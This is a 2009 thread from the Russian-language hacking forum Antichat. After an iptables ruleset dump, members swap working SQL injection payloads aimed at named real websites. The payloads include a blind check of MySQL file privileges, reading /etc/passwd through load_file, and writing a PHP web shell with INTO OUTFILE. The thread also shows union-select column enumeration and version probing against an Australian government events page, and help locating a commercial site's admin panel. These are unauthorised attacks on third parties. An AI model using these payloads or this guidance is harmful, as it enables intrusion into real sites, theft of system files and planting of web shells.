ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.09.2009, 21:32
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Код:
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- урл сайта anywhere tcp flags:!FIN,SYN,RST,ACK/SYN
ACCEPT udp -- урл сайта anywhere
ACCEPT tcp -- урл сайта anywhere tcp flags:!FIN,SYN,RST,ACK/SYN
ACCEPT udp -- урл сайта anywhere
ACCEPT all -- anywhere anywhere
ACCEPT icmp -- anywhere anywhere limit: avg 10/sec burst 5
DROP all -- anywhere 255.255.255.255
DROP all -- anywhere 198.202.66.255
DROP all -- base-address.mcast.net/8 anywhere
DROP all -- anywhere base-address.mcast.net/8
DROP all -- 255.255.255.255 anywhere
DROP all -- anywhere 0.0.0.0
DROP all -- anywhere anywhere state INVALID
LSI all -f anywhere anywhere limit: avg 10/min burst 5
INBOUND all -- anywhere anywhere
INBOUND all -- anywhere perutz.salk.edu
INBOUND all -- anywhere perutz.salk.edu
INBOUND all -- anywhere 198.202.66.255
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere LOG level info prefix `Unknown Input'
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT icmp -- anywhere anywhere limit: avg 10/sec burst 5
TCPMSS tcp -- anywhere anywhere tcp flags:SYN,RST/SYN TCPMSS clamp to PMTU
OUTBOUND all -- anywhere anywhere
ACCEPT tcp -- anywhere 198.202.66.0/24 state RELATED,ESTABLISHED
ACCEPT udp -- anywhere 198.202.66.0/24 state RELATED,ESTABLISHED
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere LOG level info prefix `Unknown Forward'
Chain OUTPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- урл сайта урл сайта tcp dpt:domain
ACCEPT udp -- урл сайта урл сайта udp dpt:domain
ACCEPT tcp -- урл сайта урл сайта tcp dpt:domain
ACCEPT udp -- урл сайта урл сайта udp dpt:domain
ACCEPT all -- anywhere anywhere
DROP all -- base-address.mcast.net/8 anywhere
DROP all -- anywhere base-address.mcast.net/8
DROP all -- 255.255.255.255 anywhere
DROP all -- anywhere 0.0.0.0
DROP all -- anywhere anywhere state INVALID
OUTBOUND all -- anywhere anywhere
OUTBOUND all -- anywhere anywhere
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere LOG level info prefix `Unknown Output'
Chain INBOUND (4 references)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT udp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT all -- 198.202.66.0/24 anywhere
ACCEPT all -- 198.202.69.0/24 anywhere
ACCEPT all -- 10.0.0.0/8 anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:smtp
ACCEPT udp -- anywhere anywhere udp dpt:smtp
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT udp -- anywhere anywhere udp dpt:http
LSI all -- anywhere anywhere
Chain LOG_FILTER (5 references)
target prot opt source destination
Chain LSI (2 references)
target prot opt source destination
LOG_FILTER all -- anywhere anywhere
LOG tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN limit: avg 1/sec burst 5 LOG level info prefix `Inbound '
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN
LOG tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/RST limit: avg 1/sec burst 5 LOG level info prefix `Inbound '
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/RST
LOG icmp -- anywhere anywhere icmp echo-request limit: avg 1/sec burst 5 LOG level info prefix `Inbound '
DROP icmp -- anywhere anywhere icmp echo-request
LOG all -- anywhere anywhere limit: avg 5/sec burst 5 LOG level info prefix `Inbound '
DROP all -- anywhere anywhere
Chain LSO (0 references)
target prot opt source destination
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere limit: avg 5/sec burst 5 LOG level info prefix `Outbound '
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
Chain OUTBOUND (3 references)
target prot opt source destination
ACCEPT icmp -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT udp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT all -- anywhere anywhere
Последний раз редактировалось warlok; 28.09.2009 в 22:27..
|
|
|
29.09.2009, 12:39
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 7
Провел на форуме:
31392
Репутация:
0
|
|
можно ли в mysql в подзапросе записать инфу в файл?
|
|
|
|
29.09.2009, 13:13
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
paypoker можно через into outfile при соответсвующих правах
|
|
|
|
29.09.2009, 14:08
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 7
Провел на форуме:
31392
Репутация:
0
|
|
Сообщение от warlok
paypoker можно через into outfile при соответсвующих правах
http://xxx/xxx?id=48535'/**/and%22x%22/**/regexp/**/concat(%22x{1,25%22,/**/if(substring((SELECT/**/file_priv/**/FROM/**/mysql.user%20WHERE/**/user/**/=/**/'root'),1,1)/**/=/**/'Y',/**/(select/**/1/**/union/**/select/**/2),/**/%226}%22))/**/and/**/1='1
Subquery returns more than 1 row. т.е. права есть
Код:
select product_list.id, product_manufacturers.manname, product_list.manpart, product_list.descr, product_list.upccode, product_list.platform, product_list.sku, product_list.subsku, product_prices.price_msrp, product_prices.price_level1, product_list.refurb, product_list.demo, product_prices.instock, product_list.dropship as dship, product_list.visible from product_list, product_manufacturers, product_prices, site_skus where product_prices.price_level1 > 0 AND product_list.id = '48535'/**/and"x"/**/regexp/**/concat("x{1,25",/**/if(MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y',/**/(select/**/1/**/union/**/select/**/2),/**/"6}")) and 1='1' and product_list.kit = '0' AND product_list.manid = product_manufacturers.manid and site_skus.pid = product_list.id and site_skus.divid = '0' and product_list.id = product_prices.id group by product_list.id
собственно как? обрубать запрос нельзя обрубалки не работают 
нужно сделать через подзапрос
Последний раз редактировалось paypoker; 29.09.2009 в 14:14..
|
|
|
|
29.09.2009, 15:01
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
paypoker
проверяем файл прив
id=1+and+1=(if(load_file('/etc/passwd')+is+not+NULL,1,2))
заливаем
id=1+and+if((select+"<?php код ?>"+into+outfile+'/dir/shell.php'),1,2)=1
обрубалки и фильтры так-же как и в твоём подзапросе обойдёшь, если база старая добавь from
ну думаю если такую чудо конструкцию сумел составить, разберёшься и под себя переделаешь, это макет
|
|
|
|
29.09.2009, 15:07
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737
Репутация:
180
|
|
вот якобы скуль
http://www.bicentenary.tas.gov.au/events/event.php?id=10'
вызывает ошибку
Database error: Invalid SQL: SELECT * FROM activity WHERE id=10\'
MySQL Error: 1064 (You have an error in your SQL syntax near '\'' at line 1)
Session halted.
вроде вот оно счастье
определяю количество столбов
http://www.bicentenary.tas.gov.au/events/event.php?id=10+order+by+20
работает
http://www.bicentenary.tas.gov.au/events/event.php?id=10+order+by+21
выдает ошибку. Столбцов у нас 20 значит.
Сотмрю
http://www.bicentenary.tas.gov.au/events/event.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20
и получаю
504 ошибку,
Вы попытались получить доступ к адресу http://www.bicentenary.tas.gov.au/events/event.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16...
О_о, в чем прикол ? |
|
|
|
29.09.2009, 15:17
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
http://www.bicentenary.tas.gov.au/events/event.php?id=10+and+substring(version(),1,1)=3
rtfm
|
|
|
|
29.09.2009, 15:37
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
не могу найти админку на http://www.beeliefbotanics.com, всю бошку сломал, помогите кто может, заранее пасиб
|
|
|
|
29.09.2009, 15:55
|
|
Участник форума
Регистрация: 03.09.2009
Сообщений: 179
Провел на форуме:
1014907
Репутация:
90
|
|
http://www.beeliefbotanics.com/admin.php админка, авторизация где-то в другом месте или через куки, GET
|
|
|
|
29.09.2009, 16:02
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от WNZRS
http://www.beeliefbotanics.com/admin.php админка, авторизация где-то в другом месте или через куки, GET
ну у меня реакция - пустая страница, тоже самое и при http://www.beeliefbotanics.com/admin1012121.php например...
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
